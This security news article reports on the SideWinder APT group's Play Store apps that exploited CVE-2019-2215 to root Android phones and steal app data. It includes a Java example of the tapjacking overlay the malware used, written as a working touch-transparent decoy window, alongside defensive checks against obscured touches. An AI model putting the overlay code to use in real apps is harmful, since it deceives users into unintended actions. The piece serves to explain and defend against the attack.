The SideWinder APT group has been actively abusing a vulnerability in Android's Binder kernel driver through at
least three apps found in the Google Play store.
The apps, all file manager and photography tools, were uploaded starting in March 2019
but have since been removed. The apps involved are Camero, FileCrypt and callCam.
The vulnerability affects several Android devices, including Pixel 1 and Pixel 2
phones, and enables an attacker to gain root access.
“Upon further investigation we also found that the three apps are likely to be part
of the SideWinder threat actor group’s arsenal. SideWinder, a group that has
been active since 2012, is a known threat and has reportedly targeted military
entities’ Windows machines,” wrote
Trend Micro researchers Ecular Xu and Joseph Chen.
CVE-2019-2215 is a use-after-free in binder.c that can allow an elevation of
privilege from an application to the Linux kernel. Exploiting it requires either the
installation of a malicious local application or a separate vulnerability in a
network-facing application. Google fixed the bug in the October 2019 Android security
bulletin, so devices carrying a security patch level of 2019-10-06 or later are not
exposed to this particular flaw.
Once the malicious app is on the device, the download procedure begins. In the first of two
stages a DEX file is downloaded from the command and control server, which
in turn downloads an APK file. These actions take place outside the view of the
device owner. The command and control server contains several exploits based on CVE-2019-2215 and the
rooting tool MediaTek-SU to gain root access on the device. Once root access is
gained, the app callCam is installed to give the attacker access to the device.
At this point the device owner is brought back into the attack when the malware asks
for additional steps to be taken to complete the app's setup. What is really happening
is that the owner is viewing an overlay screen that is displayed on top of all
activity windows on the device.
“The overlay window sets its attributions to FLAG_NOT_FOCUSABLE and FLAG_NOT_TOUCHABLE,
allowing the activity windows to detect and receive the users’ touch events
through the overlay screen,” the researchers said.
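The overlay trick the researchers describe is a classic tapjacking pattern: a decoy window is drawn on top of the real activity, but because it is flagged as neither focusable nor touchable, every tap passes straight through to whatever sits underneath. The snippet below is an added example written for this article, not code from the Trend Micro report or from the callCam sample; the class name OverlayDemo and both method names are assumed, and it assumes a minSdk of 23 so that Settings.canDrawOverlays is available. It shows the overlay side with the two flags quoted above, and the check a legitimate app can apply to a sensitive control so that touches arriving through an overlay are rejected.

```java
// Added example: overlay pattern from the article plus the defensive check.
// Names (OverlayDemo, showDecoyOverlay, isObscuredTouch, hardenSensitiveView)
// are assumed for illustration; nothing here is from the callCam sample.
import android.content.Context;
import android.graphics.Color;
import android.graphics.PixelFormat;
import android.os.Build;
import android.provider.Settings;
import android.util.Log;
import android.view.Gravity;
import android.view.MotionEvent;
import android.view.View;
import android.view.WindowManager;
import android.widget.TextView;

public class OverlayDemo {

    /** Attacker side: a full-screen, touch-transparent decoy window.
     *  Requires the SYSTEM_ALERT_WINDOW ("draw over other apps") permission. */
    public static View showDecoyOverlay(Context ctx, String decoyText) {
        if (!Settings.canDrawOverlays(ctx)) {
            return null; // permission not granted; overlay cannot be shown
        }
        WindowManager wm = (WindowManager) ctx.getSystemService(Context.WINDOW_SERVICE);
        int type = Build.VERSION.SDK_INT >= Build.VERSION_CODES.O
                ? WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY
                : WindowManager.LayoutParams.TYPE_PHONE; // pre-Oreo (deprecated) type
        WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
                WindowManager.LayoutParams.MATCH_PARENT,
                WindowManager.LayoutParams.MATCH_PARENT,
                type,
                // The two flags quoted in the article: the overlay never takes
                // focus and never consumes touches, so taps fall through to the
                // activity underneath while the user only sees the decoy text.
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE
                        | WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE,
                PixelFormat.TRANSLUCENT);
        lp.gravity = Gravity.TOP | Gravity.START;

        TextView decoy = new TextView(ctx);
        decoy.setBackgroundColor(Color.WHITE);
        decoy.setText(decoyText); // e.g. a fake "finish setup" instruction
        wm.addView(decoy, lp);
        return decoy;
    }

    /** Defender side: true if this touch was delivered while another window
     *  was drawn over the receiving window at the touch point. */
    public static boolean isObscuredTouch(MotionEvent ev) {
        int flags = ev.getFlags();
        boolean obscured = (flags & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0;
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
            // API 29+ also reports partial overlap.
            obscured |= (flags & MotionEvent.FLAG_WINDOW_IS_PARTIALLY_OBSCURED) != 0;
        }
        return obscured;
    }

    /** Apply to any control whose tap grants something (permission prompt,
     *  confirm button, PIN pad). */
    public static void hardenSensitiveView(View v) {
        // Framework-level filter: the view discards touches whenever another
        // window obscures it. Equivalent to android:filterTouchesWhenObscured.
        v.setFilterTouchesWhenObscured(true);
        // Explicit check as a second line of defence and for logging.
        v.setOnTouchListener((view, ev) -> {
            if (isObscuredTouch(ev)) {
                Log.w("OverlayDemo", "touch rejected: window is obscured");
                return true; // consume the event without acting on it
            }
            return false; // let the normal click handling proceed
        });
    }
}
```

Two caveats apply. setFilterTouchesWhenObscured only helps when the victim app opts in on each sensitive control; the apps listed later in this article would have had to do that themselves. Also, starting with Android 12 the platform blocks touches that pass through an untrusted overlay belonging to another app, so this particular overlay configuration is far less effective on current releases, but it still works on the older, unpatched devices that CVE-2019-2215 targets.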
Those root capabilities are then used to gain access to device information, including the
data of WeChat, Outlook, Twitter, Yahoo Mail, Facebook, Gmail and Chrome.
The collected data is encrypted before transmission to the C2 server.